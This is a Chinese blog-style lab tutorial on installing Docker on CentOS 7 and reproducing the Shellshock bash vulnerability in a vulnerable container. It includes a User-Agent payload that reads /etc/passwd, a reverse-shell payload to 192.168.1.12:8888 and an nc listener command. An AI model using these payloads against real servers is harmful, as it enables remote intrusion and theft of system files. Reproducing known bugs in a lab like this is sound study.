「安全小实验」利用Docker快速搭建并复现bash_shellshock

上一篇讲了乌班图的docker安装，这次复现使用centos7，意图很明显啦，就是为了让大家都知道这两种linux。最后一个经典的bash漏洞复现。不说题外话啦，开始正文

1、centos7安装

centos7 自带安装

yum install docker

启动docker

Systemctl start docker

Systemctl status docker

开启的状态

2、镜像安装

注意：这里需要阿里的更新源，否则docker语句会出现错误

搜索镜像

Docker search centos7

获取镜像

Docker pull docker.io/centos (镜像名字)

3.进入容器与退出容器

docker run -t -i docker.io/centos /bin/bash

其中-t 选项让Docker分配一个伪终端（pseudo-tty）并绑定到容器的标准输入上， -i 则让容器的标准输入保持打开。

使用exit 可以退出容器.

查看有哪些容器

docker images

打包容器

docker save -o centos7.tar docker.io/centos

载入容器

docker load --input centos7.tar

查看进程中的镜像

Docker ps -a

终止镜像

Docker stop 263c082d8fd6

移除镜像

Docker rmi 263c082d8fd6

漏洞1 bash_shellshock

首先，问题起因于一个命令ENV。

原型：

env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...]

Man是这么说的：

Display, set, or remove environment variables,Run a command in a modified environment.

我的理解是使用env命令的key=value，首先会改变环境变量key，如果没有会临时创建，注意，这里是临时的改变环境变量。然后就把value后面的内容当做命令执行，类似于PHP中的eval。

利用方法

1、pull docker镜像，搭建环境

docker pull medicean/vulapps:b_bash_shellshock1

2、启动镜像

docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1

3、使用burp抓包，更改UA

() { :;};echo ; echo; echo $(/bin/cat /etc/passwd );

反弹shell

() { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/8888 0>&1;

Kali运行

nc -l -p 8888 -vvv

某云案例

具体链接就不发了，可自行搜索shellshock，有问题可关注发送留言哦~~~~~